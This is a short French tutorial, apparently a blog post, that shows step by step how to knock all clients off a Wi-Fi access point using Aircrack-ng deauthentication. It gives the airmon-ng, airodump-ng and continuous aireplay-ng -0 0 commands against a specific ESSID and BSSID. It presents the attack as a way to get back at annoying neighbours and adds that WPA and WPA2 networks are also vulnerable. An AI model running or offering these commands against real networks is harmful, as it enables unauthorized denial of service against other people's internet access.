Attaque WEP : Deauthentication

Si vous avez des voisins ennuyants j’ai la solution pour vous : l’attaque deauthentication d’Aircrack-ng. L’attaque est simple, on va cibler un point d’accès et on va tout simplement envoyé des paquets de deauthentication à toutes les machines connectées dessus. Ces paquets deauthentication sont ce que l'on appelle des paquets de management.

Comme d’habitude pour commencer nous allons passer notre carte Wi-Fi en mode monitor avec la commande suivante :

airmon-ng start wlan0

Puis nous allons partir  la recherche du point d’accès que l’on veut attaquer à l’aide de cette commande :

airodump-ng --encrypt wep wlan0mon

Fun fact, vous pouvez aussi bien attaquer WEP que vous WPA ou WPA2. Personne n’est à l’abri ahah !

de1.png

Ensuite on relance la commande en spécifiant que l’on cible le point d’accès d’ESSID NUMERICABLE-52D1 :

airodump-ng --bssid 24:EC:99:A5:E0:9B --channel 1 wlan0mon

de2.png

La dernière ligne nous indique qu’il y a bien une machine de déconnecter. Nous allons donc forcer la déconnexion via aireplay-ng.

Pour cela entrez la commande suivante :

aireplay-ng -0 0 -e NUMERICABLE-52D1 -b 24:EC:99:A5:E0:9B wlan0mon

Voila ce qu’on obtient :

de3.png

Maintenant si on retourne sur airodump :

de4.png
Plus de clients ! Ah et au fait j’ai mis -0 0, cela veut dire que les paquets de deauthentication sont envoyés en permanence. Donc tant que vous ne stoppez pas la commande, personne ne pourra se connecter au point d’accès.